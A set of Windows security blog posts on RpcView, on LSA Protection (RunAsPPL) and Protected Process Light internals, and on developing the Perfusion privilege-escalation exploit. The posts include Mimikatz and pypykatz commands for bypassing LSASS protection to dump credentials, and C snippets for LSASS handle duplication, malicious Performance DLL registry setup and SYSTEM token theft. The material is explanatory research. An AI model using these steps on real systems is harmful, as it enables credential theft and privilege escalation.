Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credentials theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected.

Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary.

But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such an explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, hence why I wanted to write about it.

Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather gather the information which I think is the most valuable from a security consultant’s perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before.

If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:

  1. open the Registry Editor (regedit.exe) as an Administrator;
  2. open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
  3. add the DWORD value RunAsPPL and set it to 1;
  4. reboot.

That’s it! You are done!
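
If you prefer to script this change rather than use the Registry Editor, here is a minimal C sketch of the same operation (to be run as an administrator, followed by a reboot):

#include <windows.h>
#include <stdio.h>

int wmain(void)
{
    HKEY hKey;
    DWORD dwValue = 1;
    LSTATUS status;

    // Open HKLM\SYSTEM\CurrentControlSet\Control\Lsa with write access (requires admin rights).
    status = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 0, KEY_SET_VALUE, &hKey);
    if (status != ERROR_SUCCESS)
    {
        wprintf(L"RegOpenKeyEx status code: %d\r\n", status);
        return 1;
    }

    // Add the DWORD value "RunAsPPL" and set it to 1. A reboot is required for it to take effect.
    status = RegSetValueExW(hKey, L"RunAsPPL", 0, REG_DWORD, (const BYTE*)&dwValue, sizeof(dwValue));
    wprintf(L"RegSetValueEx status code: %d\r\n", status);

    RegCloseKey(hKey);
    return 0;
}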

Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions.

  • Do you use any third-party authentication module?
  • Do you use UEFI and/or Secure Boot?

Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that they meet the requirements that are listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such module would be blocked if RunAsPPL were enabled.

Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection.

You Shall Not Pass!

By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite for example. An output such as the one below should therefore look familiar.

This screenshot shows several important things:

  • the current user is a member of the default Administrators group;
  • the current user has SeDebugPrivilege (although it is currently disabled);
  • the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege;
  • the command sekurlsa::logonpasswords failed with the error code 0x00000005.

So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in.

HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);

if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function which failed along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499).

Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then, it tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see on the previous screenshot is that this function failed with the error code 0x00000005, which simply means “Access is denied”. This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags.

All the things I have explained so far can be considered common knowledge as they have been discussed in many other blog posts or pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts.

Bypassing RunAsPPL with Currently Known Techniques

At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short.

Technique 1 – The Revenge of the Kiwi

In the previous part, I stated that RunAsPPL effectively prevented Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it.

To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Once you are done, you can even “restore” the protection using the same command, but without the /remove argument and finally unload the driver with !-.

mimikatz # !processprotect /process:lsass.exe
mimikatz # !-

There is one thing to be aware of if you do that though! You have to know that Mimikatz does not restore the protection level to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light whereas it is PsProtectedSignerWinTcb after the protection was restored by Mimikatz. In a way, this renders the system even more secure than it was as you will see in the next part but it could also have some undesired side effects.

Technique 2 – Bring Your Own Driver

The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in-memory for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this will also break the digital signature of the file. So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do.

If you don’t want to go through the official signing process, there is a clever trick you can use. This trick consists in loading an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded it can be exploited from User-land to load an unsigned driver for example. This technique is implemented in gdrv-loader and PPLKiller for instance.

Technique 3 – Python & Katz

The last two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such a technique is still very dangerous: make one mistake and you trigger a BSOD.

More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV software that detects or blocks access to the LSASS process.

If you want to access LSASS’ memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Therefore, some AV software may block such an attempt, thus effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: simply do not invoke OpenProcess. But how do you get the initial handle then? The answer came from the following observation. Sometimes, other processes, such as in the case of Antivirus software, already have an opened handle on the LSASS process in their memory space. So, as an administrator with debug privileges, you could copy this handle into your own process and then use it to access LSASS.
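
To give an idea of what the duplication step looks like, here is a minimal sketch (simplified, not SkelSec's actual implementation); the source PID and handle value are hypothetical and assumed to have been identified beforehand, for instance by enumerating the system's handle table:

#include <windows.h>

// Minimal sketch: duplicate an existing lsass.exe handle, found in another process,
// into our own process. dwSourcePid and usHandleValue are assumed inputs.
HANDLE DuplicateLsassHandle(DWORD dwSourcePid, USHORT usHandleValue)
{
    HANDLE hSourceProcess, hLsass = NULL;

    hSourceProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwSourcePid);
    if (hSourceProcess == NULL)
        return NULL;

    // DUPLICATE_SAME_ACCESS: keep whatever access rights the source handle already has.
    DuplicateHandle(hSourceProcess, (HANDLE)(ULONG_PTR)usHandleValue, GetCurrentProcess(), &hLsass, 0, FALSE, DUPLICATE_SAME_ACCESS);

    CloseHandle(hSourceProcess);
    return hLsass;
}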

It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL because some unprotected processes may have obtained a handle on the LSASS process by other means, using a driver for instance. In that case, you can use pypykatz with the following command.

pypykatz live lsa --method handledup

On some occasions, this method worked perfectly fine for me but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine.

What are PPL Processes?

Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the things that are commonly known first so that I can explain them in more detail here.

A Long Time Ago in a Galaxy Far, Far Away…

OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning.

First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008 and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the “Protected Processes” part of Windows Internals).

In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly-sensitive processes.

A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light. PPL is actually an extension of the previous Protected Process model and adds the concept of “Protection level”, which basically means that some PP(L) processes can be more protected than others.

Protection Levels

The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;                  // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

As you probably guessed, a process’ protection level is defined by a combination of these two values. The below table lists the most common combinations.

Protection level                 Value  Signer            Type
PS_PROTECTED_SYSTEM              0x72   WinSystem (7)     Protected (2)
PS_PROTECTED_WINTCB              0x62   WinTcb (6)        Protected (2)
PS_PROTECTED_WINDOWS             0x52   Windows (5)       Protected (2)
PS_PROTECTED_AUTHENTICODE        0x12   Authenticode (1)  Protected (2)
PS_PROTECTED_WINTCB_LIGHT        0x61   WinTcb (6)        Protected Light (1)
PS_PROTECTED_WINDOWS_LIGHT       0x51   Windows (5)       Protected Light (1)
PS_PROTECTED_LSA_LIGHT           0x41   Lsa (4)           Protected Light (1)
PS_PROTECTED_ANTIMALWARE_LIGHT   0x31   Antimalware (3)   Protected Light (1)
PS_PROTECTED_AUTHENTICODE_LIGHT  0x11   Authenticode (1)  Protected Light (1)
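
As a quick sanity check of this layout, here is a minimal C sketch that decodes a protection Level byte into its Type and Signer components:

#include <stdio.h>

int main(void)
{
    unsigned char level = 0x41;                 // PS_PROTECTED_LSA_LIGHT (e.g. lsass.exe with RunAsPPL)
    unsigned char type = level & 0x07;          // Lower 3 bits -> 1 = PsProtectedTypeProtectedLight
    unsigned char signer = (level >> 4) & 0x0F; // Upper 4 bits -> 4 = PsProtectedSignerLsa

    printf("Level=0x%02X -> Type=%u, Signer=%u\n", (unsigned)level, (unsigned)type, (unsigned)signer);
    return 0;
}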

Signer Types

In the early days of Protected Processes, the protection level was binary: either a process was protected or it was not. We saw that this changed when PPLs were introduced with Windows NT 6.3. Both PPs and PPLs now have a protection level, which is determined by a signer type as described previously. Therefore, another interesting thing to know is how the signer type and the protection level are determined.

The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file’s digital certificate: Enhanced Key Usage (EKU).

On this screenshot, you can see two examples, wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level.

Protection Precedence

The last key aspect that needs to be discussed is the Protection Precedence. In the “Protected Process Light (PPL)” part of Windows Internals 7th Edition Part 1, you can read the following:

When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa.

In other words:

  • a PP can open a PP or a PPL with full access, as long as its signer level is greater or equal;
  • a PPL can open another PPL with full access, as long as its signer level is greater or equal;
  • a PPL cannot open a PP with full access, regardless of its signer level.

Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you super powers. If you are running a protected process as a low privileged user, you will not be able to magically access other users’ processes. It’s an additional protection.

To illustrate this, I picked 3 easily identifiable processes / image files:

  • wininit.exe – Session 0 initialization
  • lsass.exe – LSASS process
  • MsMpEng.exe – Windows Defender service

Pr.  Process      Type             Signer       Level
1    wininit.exe  Protected Light  WinTcb       PsProtectedSignerWinTcb-Light
2    lsass.exe    Protected Light  Lsa          PsProtectedSignerLsa-Light
3    MsMpEng.exe  Protected Light  Antimalware  PsProtectedSignerAntimalware-Light

These 3 PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege, so user rights are not a concern in this example. This all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe cannot access either of the two other processes because it has the lowest level.

Conclusion

In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes. This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want and you could well completely disable the protection of any Protected Process. Of course, this has become a bit more complicated over the years as you are now required to load a digitally signed driver, but this restriction can be worked around as we saw.

In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that “LSASS” has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g.: “WININIT”) would still be able to open it with full access.

There is one aspect of PP/PPL that I did not mention though. The “L” in “PPL” is here for a reason. Indeed, with the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks.

Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I’ll keep you posted on Twitter. The best is yet to come, so stay tuned!

Update 2021-04-25 – The second part is now available here: Bypassing LSA Protection in Userland

Links & Resources

An Unconventional Exploit for the RpcEptMapper Registry Key Vulnerability

A few days ago, I released Perfusion, an exploit tool for the RpcEptMapper registry key vulnerability that I discussed in my previous post. Here, I want to discuss the strategy I opted for when I developed the exploit. Although it is not as technical as a memory corruption exploit, I still learned a few tricks that I wanted to share.

In the Previous Episode…

Before we begin, here is a brief summary of my last blog post. On Windows 7 / Server 2008 R2, two service registry keys are configured with weak permissions: RpcEptMapper and DnsCache. Basically, these permissions provide a regular user with the ability to create subkeys. This issue is pretty simple to leverage. One just has to create a Performance key and populate it with a few values, among which is the absolute path of a Performance DLL. In order for this DLL to be loaded by a privileged process, one just has to query the Performance counters of the machine (by invoking Get-WmiObject Win32_Perf in PowerShell for example). When doing so, the WMI service should load the DLL as NT AUTHORITY\SYSTEM and execute three predefined functions that must be exported by the library (and that are also configured in the Performance registry key).
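
As a reminder of what this registry setup looks like, here is a minimal C sketch. The value names Library, Open, Collect and Close are the standard ones for Performance DLLs; the DLL path and the exported function names below are placeholders, not the actual Perfusion payload.

#include <windows.h>
#include <wchar.h>

// Minimal sketch: populate the Performance subkey of the RpcEptMapper service with
// the standard Performance DLL values (placeholder path and function names).
void SetupPerformanceKey(void)
{
    HKEY hKey;
    WCHAR dllPath[] = L"C:\\Workspace\\performance.dll";
    WCHAR openFunc[] = L"OpenPerfData", collectFunc[] = L"CollectPerfData", closeFunc[] = L"ClosePerfData";

    RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Services\\RpcEptMapper\\Performance",
                    0, NULL, 0, KEY_SET_VALUE, NULL, &hKey, NULL);

    RegSetValueExW(hKey, L"Library", 0, REG_SZ, (const BYTE*)dllPath,     (DWORD)((wcslen(dllPath) + 1) * sizeof(WCHAR)));
    RegSetValueExW(hKey, L"Open",    0, REG_SZ, (const BYTE*)openFunc,    (DWORD)((wcslen(openFunc) + 1) * sizeof(WCHAR)));
    RegSetValueExW(hKey, L"Collect", 0, REG_SZ, (const BYTE*)collectFunc, (DWORD)((wcslen(collectFunc) + 1) * sizeof(WCHAR)));
    RegSetValueExW(hKey, L"Close",   0, REG_SZ, (const BYTE*)closeFunc,   (DWORD)((wcslen(closeFunc) + 1) * sizeof(WCHAR)));

    RegCloseKey(hKey);
}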

WMI and the Performance Counters

The documentation states that “Windows Performance Counters provide a high-level abstraction layer that provides a consistent interface for collecting various kinds of system data such as CPU, memory, and disk usage”. Further, in the About section, you can read that there are four main ways to use Performance counters, and one of them is through the WMI Performance Counter Classes. This is more or less how I found out that you could query these counters with Get-WmiObject Win32_Perf in PowerShell. This type of interaction is potentially very interesting because it involves a very common type of IPC (Inter-Process Communication) on Windows, which is RPC (Remote Procedure Call), or more precisely DCOM (Distributed Component Object Model) in this case (DCOM works on top of RPC). Such a mechanism is especially required when a low-privileged process needs to interact with a more privileged one, such as the WMI service in our case.

This explains why, as a regular user, we were able to force the WMI service to load our DLL. However, this type of trigger is a double-edged sword. Indeed, when I initially worked on the Proof-of-Concept, I noticed that, on rare occasions, the DLL would not be loaded as NT AUTHORITY\SYSTEM and the exploit would thus fail. Why is that? The answer is: “impersonation”.

When interacting with another process, especially if it is a privileged service, impersonation is very common. To understand why it is so important, you have to keep in mind that, whenever you invoke a Remote Procedure Call, you literally ask another process to execute some code and, often, using parameters that are under your control. If you are able to force a service to do things such as move an arbitrary file to an arbitrary location as NT AUTHORITY\SYSTEM for example, this can have nasty consequences. To solve this problem, the Windows API provides almost as many impersonation functions as there are IPC mechanisms. For instance, you can invoke ImpersonateNamedPipeClient as a named pipe server or RpcImpersonateClient as an RPC server.

In the case of the Performance counters, when you instantiate the remote class Win32_Perf, I observed that the WMI service sometimes creates a dedicated wmiprvse.exe process that runs as NT AUTHORITY\LOCAL SERVICE. In this case, it always impersonates the client, as illustrated on the screenshot below.

Honestly, I haven’t spent any time trying to figure out why the service would sometimes load the DLL as LOCAL SERVICE, or as SYSTEM on other occasions. What I observed though is that, if you wait long enough and then try again, the DLL would be loaded as SYSTEM. This was enough for me because I didn’t want to spend too much time on this as I have other (more interesting) projects I want to work on. Therefore, in the rest of this article, we will just consider that we have the ability to load our DLL in the context of NT AUTHORITY\SYSTEM.

Exploit Development

The idea is to build a standalone exploit. In other words, as a pentester, I want to be able to drop a simple executable on a vulnerable machine and just execute it to get a SYSTEM shell, without having to configure the registry manually or compile a DLL every time.

Now, in order to define a proper strategy to get there, we need to list the starting conditions. First, we know that a machine reboot is not required. We already know that the DLL loading can be triggered through the instantiation of a WMI class. This is very easy to do with a high-level script engine such as PowerShell but doing the same thing in C/C++ will probably require a bit of work. Then, we know that, although we modify the configuration of the RpcEptMapper (or DnsCache) service, the DLL is actually loaded by the WMI service. We will see why this is important in a moment. Last but not least, we want to be able to get a SYSTEM shell in our console but the DLL is actually loaded by a service in a totally different session, so we will have to find a way to solve this problem.

Instantiate a WMI Class in C/C++

I really want to emphasize that, when you use a command such as Get-WmiObject Win32_Perf in PowerShell, there is a loooooot of stuff going on under the hood. These cmdlets are extremely powerful and make the life of system administrators and developers a lot easier. Unless you have at least tried to develop a client program for a DCOM interface in C/C++, you cannot really appreciate that. Fortunately, the documentation provided by Microsoft is pretty good and contains several detailed examples. They even provide a complete code snippet. In order to help you realize what I’ve just said, you should just know that this sample code is written in more than 250 lines of C/C++ and that the only thing it does is query a single counter, whereas Get-WmiObject Win32_Perf actually collects all the available counters. To me, this is really mind-blowing!

In the end, here is a completely stripped-down version of the code I eventually came up with to trigger the DLL loading within the WMI service.

CoInitializeEx(NULL, COINIT_MULTITHREADED);
CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_NONE, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, 0);
CoCreateInstance(CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (void**)&pWbemLocator);
bstrNameSpace = SysAllocString(L"\\\\.\\root\\cimv2");
pWbemLocator->ConnectServer(bstrNameSpace, NULL, NULL, NULL, 0L, NULL, NULL, &pNameSpace);
CoCreateInstance(CLSID_WbemRefresher, NULL, CLSCTX_INPROC_SERVER, IID_IWbemRefresher, (void**)&pRefresher);
pRefresher->QueryInterface(IID_IWbemConfigureRefresher, (void**)&pConfig);
pConfig->AddEnum(pNameSpace, L"Win32_Perf", 0, NULL, &pEnum, &lID);
pRefresher->Refresh(0L);
pEnum->GetObjects(0L, dwNumObjects, apEnumAccess, &dwNumReturned);

The first function calls are pretty standard when working with DCOM. CoInitializeEx and CoInitializeSecurity are necessary to set up a basic communication channel between the client and the DCOM server. Then, the first CoCreateInstance gives you an initial pointer to the IWbemLocator interface. This allows you to connect to the root/cimv2 namespace and obtain an IWbemServices pointer once you have invoked ConnectServer. If you have ever used WMI queries in PowerShell, this should sound familiar. After that, you can access the class you want. Here I picked Win32_Perf because I knew it already worked with Get-WmiObject Win32_Perf. Finally, a first call to GetObjects is required to get the number of objects that will be returned by the server. This way, the client can allocate enough memory and then call GetObjects a second time to get the actual data. Yeah, we are doing quite low-level stuff in comparison to PowerShell, so you have to do this kind of thing yourself… Anyway, in our case, this second call is not required as the first one is enough to trigger the collection of the Performance counters’ data.

Communicate with the WMI Service (or not?)

Here comes the interesting part. This part is the true reason why I wanted to write about this particular exploit in the first place. Indeed, I used quite an unconventional trick to have a SYSTEM shell spawn in the same console.

When dealing with a privilege escalation exploit that involves DLL loading (in a privileged service), a very common problem arises, especially when you want to develop a standalone tool. From your exploit tool, how do you interact with the code that is executed within your DLL? Let’s say you want to spawn a SYSTEM command prompt. You can invoke CreateProcess for example but then… what? Well, good job, the command prompt has just spawned on the service’s Desktop (in session 0) and you have no way to interact with it. To solve this problem, exploit writers usually use IPC mechanisms to create a communication channel so that the client (i.e. the exploit) can interact with the server (i.e. the exploited service). For example, you can set up some named pipes, a main one to accept client requests and then three other ones so that the client can access the stdin/stdout/stderr I/O of the created process. This is actually how PsExec works by the way. The same thing can also be achieved using a TCP socket. From the exploited service (i.e. within the code of the DLL), you could bind to a local TCP port, create a process and then redirect its input/output to the socket. This way, a client just needs to connect to the local TCP port to interact with the created process. This is how bind shells work.

These are well-known techniques that I also used in previous exploits. This time though, I wanted to opt for something a bit different. And by “a bit different”, I actually mean “completely different” because I did not use any IPC mechanism at all! Or at least, not a conventional one…

In our scenario, as opposed to a typical DLL hijacking for example, we start with a significant advantage that I intentionally omitted to mention: we control the full path, and most importantly the name of the DLL that will be loaded by the privileged service. I insist on this detail because the name of the DLL itself can convey all the information we need, without having to rely on a standard IPC mechanism.

Here is the plan in a few basic steps:

  1. Create a process in the background, in a suspended state.
  2. Write the embedded DLL payload to an arbitrary location, such as the user’s Temp folder.
  3. Create the Performance subkey and populate it with the appropriate values, especially the path of the DLL file that was previously created.
  4. Instantiate the WMI class Win32_Perf to trigger the DLL loading.

At step 1, the idea is to spawn a cmd.exe Process for example. As a result of the CreateProcess call, you will get the handles and the IDs that are associated with the created Process and its main Thread. At step 2, when writing the payload DLL to the disk, we will include the ID of the Process that has just been created in the name of the file (e.g.: performance_1234.dll). You’ll see why in a moment. Steps 3 and 4 were already mentioned in the introduction and are rather self-explanatory.
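
To make steps 1 and 2 more concrete, here is a minimal sketch (simplified, not the actual Perfusion code) showing how the suspended process could be created and how its PID ends up in the DLL file name:

#include <windows.h>
#include <strsafe.h>

// Step 1: spawn cmd.exe in a suspended state and keep its PID / handles.
// Step 2: derive the payload DLL path from that PID (e.g. %TEMP%\performance_1234.dll).
BOOL PrepareClient(PROCESS_INFORMATION* pProcessInfo, LPWSTR pwszDllPath, DWORD cchDllPath)
{
    STARTUPINFOW si = { 0 };
    WCHAR commandLine[] = L"cmd.exe";
    WCHAR tempPath[MAX_PATH];

    si.cb = sizeof(si);

    if (!CreateProcessW(NULL, commandLine, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, pProcessInfo))
        return FALSE;

    GetTempPathW(MAX_PATH, tempPath);
    StringCchPrintfW(pwszDllPath, cchDllPath, L"%wsperformance_%lu.dll", tempPath, pProcessInfo->dwProcessId);

    // The caller then writes the embedded DLL to pwszDllPath, sets up the Performance key,
    // triggers the WMI class instantiation and finally calls ResumeThread(pProcessInfo->hThread).
    return TRUE;
}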

From the service’s standpoint, the DLL will first be loaded and DllMain will be invoked. Then, it will call OpenPerfData, which is one of the three functions that are exported by our library. As a side note, this is particularly convenient because we can write our code outside of the loader lock. The OpenPerfData function is where our payload will be executed. From there, we can first retrieve the name of the module (i.e. the name of the DLL file). Since the filename contains the PID of the Process we initially created as a regular user, we will be able to perform some “adjustments” on it, in the context of NT AUTHORITY\SYSTEM.

What I mean by “adjustments” is that we will actually replace its primary Token…

Replace a Process Level Token

As a reminder, on Windows, a Token represents the security context of a user in a Process or Thread. It holds some information such as the groups a user belongs to or the privileges it has. They can be of two types: Primary or Impersonation. A Primary Token is associated to a Process whereas an Impersonation Token is associated to a Thread. Thread level (i.e. Impersonation) Tokens are relevant when a service wants to impersonate a client for example. Process level Tokens, on the other hand, are not really meant to be replaced at runtime.

Before working on this exploit, my assumption was that, unlike Thread level Tokens, Process level Tokens were immutable. As soon as a Process is created, I thought that you could not change its Primary Token, unless you were able to execute some arbitrary code in the Kernel. But I was wrong! Though, in my defense, I have to say that this involves some undocumented stuff.

The exploit steps I mentioned previously should make a little more sense now. From within the DLL (i.e. in the context of the privileged service), here are the steps we need to follow:

  1. Create a copy of the current Process’ Token (by calling DuplicateTokenEx).
  2. Open the client’s Process. We can do that because we know its PID.
  3. Replace the client’s Process Token with the one we created at step 1.

The first step is very simple and self-explanatory. Steps 2 and 3 are self-explanatory as well but they actually require very specific privileges. Fortunately for us, it seems that the Token of the WMI service’s Process has all the privileges that exist on Windows, as illustrated on the screenshot below. Anyway, as long as we execute arbitrary code in the context of NT AUTHORITY\SYSTEM we can recover any privilege we want.
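
For steps 1 and 2, a minimal sketch (simplified, not the exact Perfusion implementation) could look like the snippet below; dwClientPid is the PID extracted from the DLL file name.

HANDLE hProcessToken = NULL, hSystemTokenDup = NULL, hClientProcess = NULL;

// Step 1: duplicate the current (SYSTEM) Process' Token as a new Primary Token.
OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE | TOKEN_QUERY, &hProcessToken);
DuplicateTokenEx(hProcessToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &hSystemTokenDup);

// Step 2: open the client's Process, whose PID (dwClientPid) was extracted from the DLL file name.
hClientProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwClientPid);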

